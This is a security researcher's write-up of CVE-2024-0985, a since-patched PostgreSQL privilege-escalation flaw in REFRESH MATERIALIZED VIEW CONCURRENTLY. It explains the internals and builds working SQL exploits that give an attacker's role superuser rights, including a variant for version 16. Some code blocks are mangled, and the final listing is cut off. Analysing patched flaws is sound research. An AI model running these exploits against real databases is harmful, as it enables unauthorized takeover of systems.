In February 2024,
the PostgresSQL Project
announced patches for CVE-2024-0985,
a vulnerability which allowed an attacker to
execute arbitrary SQL using the role of their victim.
In particular, an attacker could use the exploit to gain superuser
privileges.
I couldn’t find a write-up or proof-of-concept with details beyond the CVE notice, so I decided to see if I could work out a version of attack on my own. In the process, I discovered a way to exploit the vulnerability in version 16, which was previously thought not to be vulnerable1. The fix for v15 and below is included in 16.2 anyway, so if you’re on any of the latest supported versions, you’re safe from this attack.
The version of the attack I initially put together requires a convoluted dance to pull off correctly, but based on hints from the CVE, I think the original researcher likely presented something similar to it. In any case, it took me a lot of trial and error to piece it together, and since I learned a lot along the way, I wrote this article to share some of the discovery process I went through. It includes explanations of relevant PostgreSQL features, code snippets, implementation details about internal functionality, and bits of history on how all these came to be. If you’re just here to see a working exploit, you can jump to the end.
Getting Started
This is the original text of the vulnerability disclosure that piqued my curiosity:
Late privilege drop in
REFRESH MATERIALIZED VIEW CONCURRENTLY
in PostgreSQL allows an object creator to execute arbitrary SQL functions as the command issuer. The command intends to run SQL functions as the owner of the materialized view, enabling safe refresh of untrusted materialized views. The victim is a superuser or member of one of the attacker’s roles. The attack requires luring the victim into runningREFRESH MATERIALIZED VIEW CONCURRENTLY
on the attacker’s materialized view. As part of exploiting this vulnerability, the attacker creates functions that useCREATE RULE
to convert the internally-built temporary table to a view.
Neat. So all we need to do is:
- Construct a materialized view with an evil function call.
- Get a
superuser
to runREFRESH MATERIALIZED VIEW CONCURRENTLY
on it. - ???
- Profit.
At this point, I’m still fuzzy on the details. I don’t know enough about these commands to see how the parts should fit together. On the bright side, the SQL commands it mentions are a good starting point, so I’ll focus first on their intended use.
A Table with a View
A materialized view
(aka matview
) is a relation created from a query,
similar to a CREATE TABLE .. AS SELECT
(CTAS
) command.
Unlike a regular table,
you don’t directly modify it with INSERT
, UPDATE
, and DELETE
.
Instead, the database saves your query,
and when you issue REFRESH MATERIALIZED VIEW
,
it’ll rerun the query, build a new instance of the table,
and swap the old table with the new one.
Normally, using REFRESH MATERIALIZED VIEW
blocks
concurrent readers from accessing the table2,
but you can use the CONCURRENTLY
option to allow
SELECT
s against the old data while the table gets rebuilt.
It’s not really worth getting into it here
why you would or wouldn’t want to use this option —
for now, just note that in order to use it,
the matview
needs at least one unique index
that only uses column names (no function calls)
and targets all rows (no WHERE
clauses).
So the basic building block of attack
is a matview
that does something evil during a concurrent refresh.
How do I get to the “doing evil” part?
Since the query associated with the matview
can call functions,
I can easily make a matview
that runs arbitrary code when refreshed.
That’s not very interesting on it’s own,
since anything I can call during the REFRESH
,
I could have just called directly anyway.
More specifically, Postgres looks at the current_user
to decide whether a given action is allowed,
so what happens if a superuser
refreshes the matview
?
Can I use their privileges to upgrade my own?
What if I write something like this:
-- Setup a non-superuser role and database, then connect as that user.
CREATE ROLE r0 LOGIN ;
;
\c rdb r0
-- Use a function to populate a matview.
INTEGER LANGUAGE plpgsql AS $$ BEGIN
RETURNS RAISE NOTICE 'user %, super? %',
current_user, current_setting('is_superuser');
IF current_setting('is_superuser') THEN
r0 SUPERUSER;
END IF;
RETURN 1;
END $$ ;
-- Create a matview with an index so we can do a concurrent refresh.
CREATE MATERIALIZED VIEW mv AS SELECT pwn AS i;
(i);
-- Have a superuser refresh it concurrently.
\c rdb postgres
REFRESH MATERIALIZED VIEW CONCURRENTLY mv;
Running it with psql
produces output similar to this:
CREATE FUNCTION
NOTICE: user r0, super? off
SELECT 1
CREATE INDEX
NOTICE: user r0, super? on
ERROR: must be superuser to alter superuser roles or change superuser attribute
CONTEXT: SQL statement "ALTER USER r0 SUPERUSER"
Interesting.
When the function ran,
the current_user
was the matview
’s owner (r0
),
not the superuser
(postgres
).
Why so?
The documentation on functions gives a clue.
It says Postgres keeps track of a current_user
and a session_user
,
and it describes their difference like this:
The
session_user
is normally the user who initiated the current database connection; but superusers can change this setting withSET SESSION AUTHORIZATION
. Thecurrent_user
is the user identifier that is applicable for permission checking. Normally it is equal to the session user, but it can be changed withSET ROLE
. It also changes during the execution of functions with the attributeSECURITY DEFINER
. In Unix parlance, the session user is the “real user” and the current user is the “effective user”.
Alight, but my function doesn’t use
SECURITY DEFINER
.
It seems Postgres uses this mechanism implicitly in some cases.
Let’s put a pin in that for the moment
and focus on the earlier bit of that paragraph.
It says I can use SET ROLE
to change the current_user
.
I can see is_superuser
is on
.
What if I just change to a superuser
role?
INTEGER LANGUAGE plpgsql AS $$ BEGIN
RETURNS RAISE NOTICE 'user %, super? %',
current_user, current_setting('is_superuser');
IF current_setting('is_superuser') THEN
SET ROLE postgres;
r0 SUPERUSER;
END IF;
RETURN 1;
END $$ ;
The result:
ERROR: cannot set parameter "role" within security-restricted operation
CONTEXT: SQL statement "SET ROLE postgres"
Yeah, that would have been too easy. There is clearly something more going on here to protect the caller. What exactly is it that Postgres is doing to block the attack?
Security Sandboxing
Let’s tangent for a moment and talk about some older CVEs:
- CVE-2020-25695: “Multiple features escape ‘security restricted operation’ sandbox”
- CVE-2022-1552: “Autovacuum, REINDEX, and others omit ‘security restricted operation’ sandbox”
These both refer to the “security restricted operation” (SRO) sandbox —
the same phrase that appears in the error message I get
when I tried to use SET ROLE
during the REFRESH
.
The SRO sandbox refers to a bit within the “security context”,
an internal set of flags that Postgres uses
to decide how to interpret the current_user
.
One of the security context bits is called LOCAL_USERID_CHANGE
.
When set,
the system knows it has temporarily changed the current_user
,
and it rejects SET
and RESET
commands.
When you use SECURITY_DEFINER
, this is what prevents escalation.
The RESTRICTED_OPERATION
bit is much more limiting.
When set, the SRO bit restricts you from running commands that
can change the session state in a way
that persists after your code completes,
(things like creating temporary tables or deferring a constraint trigger,
among many others3).
By abusing these commands,
you can essentially trick the caller into running code of your choice.
Digging into the history
of the initial development of these mechanisms,
we can unpin that thought
how our matview
function is running as if it set SECURITY_DEFINER
.
In this 2008 thread
from the pgsql-hackers
list,
Tom Lane discusses
the security implications of running index functions as the caller
during VACUUM FULL
and ANALYZE
:
Up to now I think we’ve always thought of
SECURITY DEFINER
functions as being a mechanism for increasing one’s privilege level. However, in this context we want to use them as a mechanism for decreasing privilege level, and if we want to use them that way then the privilege loss has to be air-tight. The problem there is that so far it’s been possible for aSECURITY DEFINER
function to executeSET SESSION AUTHORIZATION
orSET ROLE
and thereby regain whatever privileges are held at the outermost level. The patch as applied disallows both these operations inside a security-definer context.[…]
The other issue that ought to be on the TODO radar is that we’ve only plugged the hole for the very limited case of maintenance operations that are likely to be executed by superusers. If user A modifies user B’s table (via
INSERT
/UPDATE
/DELETE
), there are a lot of bits of code that are controlled by B but will be executed with A’s permissions; so A must trust B a whole lot. This general issue has been understood for quite some time, I think, but maybe it’s time to make a serious push to solve it. Offhand I can cite the following ways in which B could exploit A’s privileges:
- triggers
- functions in indexes
- functions in CHECK constraints
- functions in DEFAULT expressions
- functions in rules (including VIEW definitions)
The CVEs above represent mistakes or omissions
in the implementation, allowing exactly that kind of exploit.
The 2020 vulnerability was discovered by Etienne Stalmans,
who wrote this excellent post covering it.
The exploit works by
creating a table with an INITIALLY DEFERRED
constraint trigger,
and then getting a superuser
to run a function
that INSERT
s into the table, enqueuing the trigger.
When the superuser
’s transaction COMMIT
s,
the trigger function executes,
but at that point,
it’s executing outside the SRO sandbox,
and the current_user
has switched back to the caller.
To summarize,
changing the current_user
prevents an attacker from using the caller’s privileges,
the LOCAL_USERID_CHANGE
prevents them from simply changing roles,
and the SRO bit keeps them from setting things up
to run code after the current_user
changes back to the caller.
All three are required for a superuser
to safely execute untrusted code.
I need to find a place in the code where those restrictions are relaxed at a time that I can execute my own code. So how do I find such a place?
Refresh, Before and After
In order to do anything naughty, I need to get around the SRO sandbox. To do that, I’ll need to understand the implementation details. I reckon the sensible thing to do is look up the patch that fixes this issue, see what the author says about it, and compare the code before and after4.
Here’s the commit message for the patch:
The internal commands in
REFRESH MATERIALIZED VIEW CONCURRENTLY
are correctly executed inSECURITY_RESTRICTED_OPERATION
mode, except for creating the temporary “diff” table, because you cannot create temporary tables in SRO mode. But creating the temporary “diff” table is a pretty complexCTAS
command that selects from another temporary table created earlier in the command. If you can cajole thatCTAS
command to execute code defined by the table owner, the table owner can run code with the privileges of the user running theREFRESH
command.The proof-of-concept reported to the security team relied on
CREATE RULE
to convert the internally-built temp table to a view. That’s not possible since commitb23cd185fd
, and I was not able to find a different way to turn theSELECT
on the temp table into code execution, so as far as I know this is only exploitable in v15 and below. That’s a fiddly assumption though, so apply this patch to master and all stable versions.
OK, I think I can fill in a little more of the attack:
- Construct a materialized view with an evil function call.
- Get a
superuser
to runREFRESH MATERIALIZED VIEW CONCURRENTLY
on it. - “Cajole that
CTAS
” into running attack code. - Profit.
Let’s see the code and examine what the fix changed.
I’m explaining the gist of the original code and the patch. Although I’m including some implementation details that will be relevant later, I’ve intentionally removed irrelevant details and error-checking, and I’m taking some liberties with pseudo-code and formatting to make it easier to grok. If anything looks off, or if you’re looking to fully understand the implementation, you should follow the links to see the actual code.
The primary entry point for the refresh code
is ExecRefreshMatView
.
Most of the code is shared for ordinary and concurrent refreshes.
In both cases, it executes the matview
’s associated query
and stores the results in a “transient” table.
The new table will be named pg_temp_{OID of the matview}
5,
and for a concurrent refresh, it’ll be in the temporary schema.
Since this step needs to execute potentially-untrusted user-defined code,
it changes the current user to that of the matview
’s owner
and sets the SECURITY_RESTRICTED_OPERATION
bit in the security context.
void
For a non-concurrent refresh,
the refresh_by_heap_swap
swaps this new table in place of the old one
and reconstructs its indexes.
That code path never leaves SRO mode,
so we’re not going to discuss it further.
For a concurrent refresh, there’s a lot more work involved.
The refresh_by_match_merge
needs to find the differences between
the existing matview
and new temp
table,
then modify the matview
to match temp
.
To do so, this code dynamically generates and executes SQL.
That SQL looks roughly like the following:
1.
Do some pre-work to help the planner optimize
and check there are no duplicate rows in the new data.
This code raises an error if that SELECT
query returns anything.
ANALYZE ${tempname};
SELECT newdata.*::${tempname} FROM ${tempname} newdata
WHERE newdata.* IS NOT NULL AND EXISTS
(
SELECT 1 FROM ${tempname} newdata2
WHERE newdata2.* IS NOT NULL
AND newdata2.* OPERATOR(pg_catalog.*=) newdata.*
AND newdata2.ctid OPERATOR(pg_catalog.<>) newdata.ctid
);
2.
Disable SRO.
Since it can’t create a temporary table using SQL while in SRO mode,
it drops down to just LOCAL_USERID_CHANGE
.
;
3.
Create the temporary table using
CREATE [TEMP] TABLE .. AS SELECT
(CTAS).
The code here builds up comparisons
for the columns named by each unique index
and finishes with comparison on the full row.
CREATE TEMP TABLE ${diffname} AS
SELECT
mv.ctid AS tid,
newdata.*::${tempname} AS newdata
FROM ${matviewname} mv
FULL JOIN ${tempname} newdata ON (
-- ...ANDed together comparisons...
AND newdata.* OPERATOR(pg_catalog.*=) mv.*
)
WHERE newdata.* IS NULL OR mv.* IS NULL
ORDER BY tid;
4. Resume SRO.
;
5.
Use DELETE
and INSERT
commands
to bring the matview
6
up-to-date with the transient table,
then clean up the temp
tables.
ANALYZE ${diffname};
DELETE FROM ${matviewname} mv
WHERE ctid OPERATOR(pg_catalog.=) ANY
(
SELECT diff.tid FROM ${diffname}
WHERE
diff.tid IS NOT NULL
AND diff.newdata IS NULL
);
INSERT INTO ${matviewname}
SELECT (diff.newdata).* FROM ${diffname}
WHERE tid IS NULL;
${diffname}, ${tempname};
The patch alters the logic
so that the only action that happens outside the SRO is the CREATE TEMP TABLE
.
It then resumes SRO,
uses ALTER TABLE
to add the other columns7,
and populates the table using INSERT INTO
.
The changes amount to something like this:
-- Disable SRO.
- CREATE TEMP TABLE ${diffname} AS
+ CREATE TEMP TABLE ${diffname} (tid pg_catalog.tid);
+ -- Resume SRO.
+ ALTER TABLE ${diffname} ADD COLUMN newdata ${tempname};
+ INSERT INTO ${diffname}
SELECT ...
- -- Resume SRO.
The rest of the old and new code is the same.
Now the commit message makes more sense,
and the attack is starting to come together.
The code drops out of SRO so it can create a temporary table,
so if I can get my code to run at that moment,
it’ll be less restrictedcurrent_user
will still match my role,
so I won’t be able to ALTER ROLE
yet,
and the LOCAL_USERID_CHANGE
change bit will be set,
so I won’t be able to just SET ROLE
my way out of it,
but the SRO bit won’t be set,
and I will be able to defer a trigger function to run later,
just like the 2020 attack!
But… how do I run code during a SELECT
?
Rule Out Select
The disclosure notice and commit message already gave a suggestion
for how to inject my code: CREATE RULE
.
The rule system is a topic for another day,
but the gist is that Postgres uses rules to rewrite a query tree
before it plans and executes it.
The rule system is exactly what implements views:
when a query that target a view,
it gets rewritten into one that accesses the base tables instead.
As of version 16, the documentation that explains
how views and rules are related
will tell you that a view is “very nearly the same as”
creating a table with a ON SELECT DO INSTEAD
rule,
but is quick to point out
you can’t actually write that, because tables are not allowed to have
ON SELECT
rules
Older versions, however, had a different line:
this is exactly what the
CREATE VIEW
command does internally
Before version 16, the documentation for CREATE RULE
included the following sentence, (emphasis mine):
Presently,
ON SELECT
rules can only be attached to views. (Attaching one to a table converts the table into a view.) Such a rule must be named"_RETURN"
, must be an unconditionalINSTEAD
rule, and must have an action that consists of a singleSELECT
command. This command defines the visible contents of the view. (The view itself is basically a dummy table with no storage.) It’s best to regard such a rule as an implementation detail.
Ah, ha!
So that’s what they were getting at.
The REFRESH
code creates a temporary table,
then runs my matview
query to populate it.
I can seize that moment to run CREATE RULE
,
so when the REFRESH
code continues,
and executes SELECT
,
it’ll get rewritten via my rule.
Building the Exploit
I need a bit of setup to test whether my REFRESH
exploit works.
I’ll use the same database and role setup I did in the introduction:
-- Setup a non-superuser role and database.
CREATE ROLE r0 LOGIN ;
;
\c rdb r0
Based on those CVEs above,
I’ll use a deferred trigger to give the role superuser
rights.
-- Set up the privilege escalation via a deferred trigger.
AS $$
RETURNS trigger BEGIN
IF current_setting('is_superuser') THEN
RAISE WARNING '-- user % --', current_user;
r0 SUPERUSER;
END IF;
RETURN NEW;
END $$ LANGUAGE plpgsql;
INTEGER);
(i CREATE CONSTRAINT TRIGGER trig
AFTER INSERT ON t1
INITIALLY DEFERRED
FOR EACH ROW EXECUTE PROCEDURE pwn ;
The goal is that when a superuser
runs REFRESH .. CONCURRENTLY
,
I’ll manage to INSERT INTO t1
.
I won’t be able to do that from the matview
query
until I can escape the sandbox,
but I can test this trigger directly:
\c rdb postgres
SELECT rolname, rolsuper FROM pg_roles WHERE rolname = 'r0';
INSERT INTO t1 VALUES (1);
SELECT rolname, rolsuper FROM pg_roles WHERE rolname = 'r0';
As expected:
+---------+----------+
| rolname | rolsuper |
+---------+----------+
| r0 | f |
+---------+----------+
WARNING: -- user postgres --
+---------+----------+
| rolname | rolsuper |
+---------+----------+
| r0 | t |
+---------+----------+
Finally, I know
I’ll need to generate and execute dynamic SQL
that targets the transient table,
so I’ll create a helper function to construct its name.
From the code, I know it is generated as pg_temp_{OID of the matview}
.
I’m casting first to text
,
to avoid issues if the matview
doesn’t exist yet,
then to regclass
to make Postgres look up its OID
,
then finally to oid
so I get its numeric representation.
It’s not totally necessary,
but I’ll schema-qualify it and use format
to avoid quoting issues.
-- Get the (expected) name of the target temp table.
TEXT AS $$
RETURNS SELECT format('%I.%I',
pg_my_temp_schema ::regnamespace,
'pg_temp_' || 'mv'::text::regclass::oid
);
$$ LANGUAGE SQL STABLE ;
A Reasonable Attempt
Now then, I’ve got all the pieces; it’s time to put them together.
I’ll create a matview
named mv
that calls a function conv
to convert the transient table to a view,
adding a ON SELECT
rule to call an attack
function
that inserts into t1
, deferring the trigger.
Easy as pie:
-- Convert the temp table to a view.
INTEGER AS $$
RETURNS DECLARE
target TEXT := get_target ;
BEGIN
-- Only run if the table exists.
IF to_regclass(target) IS NOT NULL THEN
EXECUTE format('CREATE RULE "_RETURN" AS ON SELECT TO %s DO INSTEAD SELECT attack() AS i', target);
END IF;
RETURN 1;
END $$ LANGUAGE plpgsql;
-- Defer the trigger function to run on commit.
INTEGER AS $$
RETURNS BEGIN
INSERT INTO t1 VALUES (1);
RETURN 2;
END $$ LANGUAGE plpgsql;
CREATE MATERIALIZED VIEW mv AS SELECT conv AS i;
(i);
Let’s give it a shot:
\c rdb postgres
REFRESH MATERIALIZED VIEW CONCURRENTLY mv;
SELECT rolname, rolsuper FROM pg_roles WHERE rolname = 'r0';
And the moment of truth:
server closed the connection unexpectedly
This probably means the server terminated abnormally
before or while processing the request.
fatal: connection to server was lost
Uhh… OK. What happened? Let’s check the logs:
LOG: server process (PID 18335) was terminated by signal 11: Segmentation fault
DETAIL: Failed process was running: REFRESH MATERIALIZED VIEW CONCURRENTLY mv;
LOG: terminating any other active server processes
Bonus Content: SIGSEGV
Although I focused on the part of the code
that executes SQL via the Server Programming Interface (SPI),
the part that populates the transient table
creates a “receiver” struct
that it passes to the execution engine.
When my query function returned its result,
the calls an insert function set on this receiver.
It’s basically a wrapper function
that delegates the call to something like rel->rd_tableam->tuple_insert
.
As a consequence, if during the refresh,
I abuse the matview
’s query to convert the table to a view,
then something along that chain gets set to NULL
,
and it segfaults and takes the server down with it.
Perhaps there’s a way to take advantage of the crash,
(maybe grab the temporary table and use it for other purposes?),
but this particular bug was fixed in a release later,
anyway.
Set That Aside
If my matview
function returns a value
after I’ve converted the transient table to a view,
it’ll segfault,
but I can side-step the issue
with a set-returning function.
In this case,
I use RETURN NEXT
if I wanted to return a real value,
but I’ll just use a plain RETURN
so it won’t try to insert anything:
-- Convert the temp table to a view.
INTEGER AS $$
RETURNS SETOF DECLARE
target TEXT := get_target ;
BEGIN
-- Only run if the table exists.
IF to_regclass(target) IS NOT NULL THEN
EXECUTE format('CREATE RULE "_RETURN" AS ON SELECT TO %s DO INSTEAD SELECT attack() AS i', target);
END IF;
RETURN;
END $$ LANGUAGE plpgsql;
Am I good to go now?
WARNING: skipping "pg_temp_24588" --- cannot analyze non-tables or special system tables
ERROR: column newdata2.ctid does not exist
LINE 1: ... newdata2.* OPERATOR(pg_catalog.*=) newdata.* AND newdata2.c...
^
QUERY: SELECT newdata.*::pg_temp_4.pg_temp_24588 FROM pg_temp_4.pg_temp_24588 newdata
WHERE newdata.* IS NOT NULL AND EXISTS (
SELECT 1 FROM pg_temp_4.pg_temp_24588 newdata2
WHERE newdata2.* IS NOT NULL
AND newdata2.* OPERATOR(pg_catalog.*=) newdata.*
AND newdata2.ctid OPERATOR(pg_catalog.<>) newdata.ctid
)
Not quite. I didn’t expect that WARNING
, but it makes sense:
it’s coming from that first ANALYZE
in the code,
and now that pg_temp_xxx
is a view,
there’s nothing to analyze.
Luckily, it’s a warning and not an error, so I’m going to just ignore it.
Unfortunately, there is an error stopping the operation:
column newdata2.ctid does not exist
.
The code is trying to compare ctid
s,
a system column that identifies a row’s physical location.
Since views don’t have storage,
they don’t have a ctid
column.
Maybe I can just add one?
CREATE MATERIALIZED VIEW mv AS SELECT conv AS i, 1 AS ctid;
Nope.
ERROR: column name "ctid" conflicts with a system column name
Bummer. How about renaming it after converting it to a view?
-- Convert the temp table to a view.
INTEGER AS $$
RETURNS SETOF DECLARE
target TEXT := get_target ;
BEGIN
-- Only run during a refresh, not the initial build.
IF to_regclass(target) IS NOT NULL THEN
EXECUTE format('CREATE RULE "_RETURN" AS ON SELECT TO %s DO INSTEAD SELECT attack() AS i, 1 AS x', target);
EXECUTE format('ALTER TABLE %s RENAME COLUMN x TO ctid', target);
END IF;
RETURN;
END $$ LANGUAGE plpgsql;
CREATE MATERIALIZED VIEW mv AS SELECT conv AS i, 1 AS x;
(i);
That works, but I’m immediately met with a new error:
ERROR: cannot fire deferred trigger within security-restricted operation
CONTEXT: SQL statement "INSERT INTO t1 VALUES (1)"
PL/pgSQL function attack() line 2 at SQL statement
SQL statement "SELECT newdata.*::pg_temp_3.pg_temp_24669
FROM pg_temp_3.pg_temp_24669 newdata
WHERE newdata.* IS NOT NULL AND EXISTS (
SELECT 1 FROM pg_temp_3.pg_temp_24669 newdata2
WHERE newdata2.* IS NOT NULL
AND newdata2.* OPERATOR(pg_catalog.*=) newdata.*
AND newdata2.ctid OPERATOR(pg_catalog.<>) newdata.ctid
)"
This is coming from that initial error-checking step.
It SELECT
s from the temp table table
(twice, in fact, due to the inner SELECT
),
so it also triggers my attack
function.
That’s still inside the SRO context, hence the error.
I can think of a bunch of work-arounds,
but maybe the laziest is to just catch the exception and ignore it:
-- Defer the trigger function to run on commit.
INTEGER AS $$
RETURNS BEGIN
BEGIN
INSERT INTO t1 VALUES (1);
EXCEPTION WHEN OTHERS THEN -- do nothing
END;
RETURN 2;
END $$ LANGUAGE plpgsql;
Argh… another error!
ERROR: "pg_temp_24692" is not a table
HINT: Use DROP VIEW to remove a view.
CONTEXT: SQL statement "DROP TABLE pg_temp_4.pg_temp_24692_2, pg_temp_4.pg_temp_24692"
This time, it’s the DROP
statement at the end of the function.
Again, that table-to-view conversion is getting in the way.
Another Name for a View
I need an actual table with the expected name for DROP
to work.
I don’t think there’s a way to convert the view back into a table
(the table-to-view conversion is a hack9, after all),
but since I now have a way to create objects in the temporary schema,
I can just create a new table for it to drop.
But then there’s another problem:
I can’t create a table with that name, since the view is using it.
If I try to just DROP
the view,
I’ll get an error
because the diff
table’s columns depend on the temp
view’s rowtype
.
If I try to DROP VIEW .. CASCADE
to get around that,
I’ll get a different error,
because obviously both the table and the view
are being used by the active query.
But I don’t really need to drop the view; I just need it out of the way so I can create the table. I can just rename the view to something arbitrary, then create a table with the right name10.
-- Defer the trigger function to run on commit and make a new table.
INTEGER AS $$
RETURNS DECLARE
target TEXT := get_target ;
BEGIN
BEGIN
INSERT INTO t1 VALUES (1);
EXECUTE format('ALTER VIEW %s RENAME TO remove_later', target);
EXECUTE format('CREATE TEMP TABLE %s()', target);
EXCEPTION WHEN OTHERS THEN -- do nothing
END;
RETURN 2;
END $$ LANGUAGE plpgsql;
Though it’s not strictly necessary, I’ll be polite and clean up after myself by dropping the view from the deferred function call:
-- Set up the privilege escalation via a deferred trigger.
AS $$
RETURNS trigger BEGIN
IF current_setting('is_superuser') THEN
RAISE WARNING '-- user % --', current_user;
r0 SUPERUSER;
END IF;
EXISTS remove_later;
IF RETURN NEW;
END $$ LANGUAGE plpgsql;
INTEGER);
(i CREATE CONSTRAINT TRIGGER trig
AFTER INSERT ON t1
INITIALLY DEFERRED
FOR EACH ROW EXECUTE PROCEDURE pwn ;
And there it is.
WARNING: skipping "pg_temp_24863" --- cannot analyze non-tables or special system tables
WARNING: -- user postgres --
REFRESH MATERIALIZED VIEW
+---------+----------+
| rolname | rolsuper |
+---------+----------+
| r0 | t |
+---------+----------+
Woot!
While I can’t be certain exactly what the proof-of-concept sent to the security team looked like, I suspect it looked similar. You can see the full code for this exploit below, but I’m still not satisfied with that “fiddly assumption”. While making my way through this, there was a bit of code that caught my eye, and might provide another path.
Casting Off the <16 Restrictions
The exploit so far doesn’t work in version 16
because I can’t use CREATE RULE
to convert the table into a view.
From everything above,
I know the CTAS
is my only opportunity for shenanigans,
so I need a different way to get that query
to transfer control to a function I wrote.
The only other way I can think to sneak in a function call
is to exploit some aspect of Postgres’s extensibility.
The query doesn’t include any explicit function calls,
but it is generating a bunch of equality comparisons
of the form newdata.col = mv.col
.
Postgres lets you define
new types and new operators,
so maybe I can use this
to get it to call my function.
If I create matview
with indexes on types I define,
the generated SQL looks something like this:
newdata.b OPERATOR(pg_catalog.=) mv.b -- base types
AND newdata.r::pg_catalog.anyrange OPERATOR(pg_catalog.=) mv.r::pg_catalog.anyrange -- range type
AND newdata.c::pg_catalog.record OPERATOR(pg_catalog.=) mv.c::pg_catalog.record -- composite type
AND newdata.e::pg_catalog.anyenum OPERATOR(pg_catalog.=) mv.e::pg_catalog.anyenum -- enum type
AND newdata.d::pg_catalog.int8 OPERATOR(pg_catalog.=) mv.d::pg_catalog.int8 -- domain type
Interesting. I see it generated a bunch of schema-qualified casts and references to equality operators. Can I influence it to choose a different equality operator? How does the code determine which operator function to use?
Well, when you define an index, it’ll have an associated
operator class aka opclass
,
which determines which operator the index actually uses.
Normally the index uses a sensible default opclass
based on the data type, but you can choose one explicitly.
Different opclass
es can be grouped into an opfamily
,
which records information about relationships between them,
in part to enable certain planner optimizations.
This complexity means the part of the code that generates comparisons goes through a lot of trouble to find the operator associated with each indexed column. This is going to get even further into the weeds, but bear with me for a minute. Here’s a stripped-down version of the relevant code, highlighting the portion the finds the operator:
TupleDesc tupdesc = matviewRel->rd_att;
bool foundUniqueIndex = false;
/* Iterate over each index on the matview */
If it’s easier to make sense of, here’s a SQL function that’s mostly-equivalent to the highlighted portion:
-- Return the OID of the BTree equality operator for a given opclass OID.
oid) RETURNS oid AS $$
(opclass SELECT amopopr AS operator_oid
FROM
pg_opclass opc,
pg_amop amop
WHERE
opc.oid = $1
AND amop.amopfamily = opc.opcfamily
AND amop.amoplefttype = opc.opcintype
AND amop.amoprighttype = opc.opcintype
AND amop.amopstrategy = 3 -- BTEqualStrategyNumber
AND amop.amopmethod = 403 -- BTREE_AM_OID
;
$$ LANGUAGE SQL STABLE ;
In other words,
it looks up the opclass
for the column,
then searches within its opfamily
for a btree
equality operator with matching types.
And this is all happening by OID
,
so the choice of operator seems pretty well set
by the time the REFRESH
is running,
having been assigned when the index was created.
So in order to get my operator into the opclass
,
I’ll need to either create a new operator class,
which requires superuser
privileges,
or alter an existing one, which requires owning the opclass
,
but all the default ones are owned by the bootstrap superuser
,
so it seems like this idea is dead11.
OK, but since the code is casting from my types to those pg_catalog
types,
can I just write my own CAST
function?
The function responsible for emitting the casts and schema qualifications
is generate_operator_clause
.
It emits casts whenever the operand type differs from the operator,
which is why the indexes on base types don’t involve casts,
but my custom types do.
Initially, the CAST
idea looks dead, too:
I can’t write a CAST
function involving anyrange
, record
, or anyenum
,
because it turns out those are all “pseudo-types”,
and Postgres won’t let me write casts to or from them.
The domain
type looks promising,
since an int8
is definitely not a pseudo-type,
but although I can create a CAST
from or to a DOMAIN
type,
it’ll result in a WARNING
informing me that the cast will be ignored.
But… have another look at the bit generating the actual clause:
leftop = ;
rightop = ;
;
Notice that it passes the same variables attrtype
and attname
,
both taken from the definition it found
on the index attached to the original matview
.
The code expects the columns of the temp
table
to match the ones on the matview
,
since it just created it that way.
I can modify those columns on the temp
table before this code runs,
breaking that assumption.
If I create a matview
with a column based on a domain type,
I know this code will pass that name and type to
generate_operator_clause
, and it will emit an explicit cast
to the base type — on both sides of the operator.
If I can change that type of the temp
table’s column to something else,
I can write a cast function between the domain’s base type and that type,
and it’ll run as a consequence of the explicit casts!
There are still a couple bits to work out, though.
First, in order to write a CAST
function at all,
I need to own at least one of the types involved.
Since I obviously won’t own the base type
that will be the target of the cast,
I’ll need a second custom type.
That’s an easy issue, since an enum
will work just fine.
The second issue is little trickier.
The docs on ALTER TABLE
say I can change a column’s type
provided that existing entries can be converted to the new type by an implicit cast,
but attempting to do so will give me an error:
ERROR: cannot ALTER TABLE "pg_temp_41205" because it is being used by active queries in this session
The solution is actually pretty simple: Even though I can’t change the type of a column for a given a name, I can change the name of a column for a given type. Rather than changing the type directly, I’ll just shuffle around the column names so that the name the code generates no longer refers to the column it expected, but instead a different column with a different type.
Finally, there’s a bit of wonkiness here with IMMUTABLE
functions.
In short,
I need to lie to the planner in order in order to create a CAST
function
that can actually perform an INSERT
.
You can see the full exploit below,
but here are the parts that differ from the version with CREATE RULE
:
-- Create a custom type with a cast that inserts into `t1`.
'e' );
( INTEGER) RETURNS INTEGER LANGUAGE sql AS
( $$ INSERT INTO t1 VALUES ($1) RETURNING $1; $$ ;
INTEGER LANGUAGE sql AS
(etyp) RETURNS $$ SELECT wrap_insert(1); $$ IMMUTABLE ;
CREATE CAST (etyp AS INTEGER) WITH FUNCTION evil(etyp) AS IMPLICIT ;
-- Populate the materialized view with a function that swaps column names on the temp table.
INTEGER AS $$
RETURNS DECLARE
target TEXT := get_target ;
BEGIN
IF to_regclass(target) IS NOT NULL THEN
EXECUTE format('ALTER TABLE %s RENAME COLUMN i TO x', target);
EXECUTE format('ALTER TABLE %s RENAME COLUMN e TO i', target);
EXECUTE format('ALTER TABLE %s RENAME COLUMN x TO e', target);
END IF;
RETURN 1;
END
$$ LANGUAGE plpgsql;
CREATE MATERIALIZED VIEW mv AS SELECT swap AS i, 'e'::etyp as e ;
(i);
The Exploits
Below are simplified versions of the exploits, executable using psql
.
Using CREATE RULE
This version uses CREATE RULE
to convert the table to a view
and hence only works in unpatched versions <=15:
-- Setup a non-superuser role and database.
CREATE ROLE r0 LOGIN ;
;
\c rdb r0
-- Set up the privilege escalation via a deferred trigger.
AS $$
RETURNS trigger BEGIN
IF current_setting('is_superuser') THEN
RAISE WARNING '-- user % --', current_user;
r0 SUPERUSER;
END IF;
EXISTS remove_later;
IF RETURN NEW;
END $$ LANGUAGE plpgsql;
INTEGER);
(i CREATE CONSTRAINT TRIGGER trig
AFTER INSERT ON t1
INITIALLY DEFERRED
FOR EACH ROW EXECUTE PROCEDURE pwn ;
-- Get the (expected) name of the target temp table.
TEXT AS $$
RETURNS SELECT format('%I.%I',
pg_my_temp_schema ::regnamespace,
'pg_temp_' || 'mv'::text::regclass::oid
);
$$ LANGUAGE SQL STABLE ;
-- Convert the temp table to a view and rename the ctid column.
INTEGER AS $$
RETURNS SETOF DECLARE
target TEXT := get_target ;
BEGIN
-- Only run during a refresh, not the initial build.
IF to_regclass(target) IS NOT NULL THEN
EXECUTE format('CREATE RULE "_RETURN" AS ON SELECT TO %s DO INSTEAD SELECT attack() AS i, 1 as x', target);
EXECUTE format('ALTER VIEW %s RENAME COLUMN x TO ctid', target);
END IF;
RETURN;
END $$ LANGUAGE plpgsql;
-- Defer the trigger function to run on commit.
INTEGER AS $$
RETURNS DECLARE
target TEXT := get_target ;
BEGIN
BEGIN
INSERT INTO t1 VALUES (1);
EXECUTE format('ALTER VIEW %s RENAME TO remove_later', target);
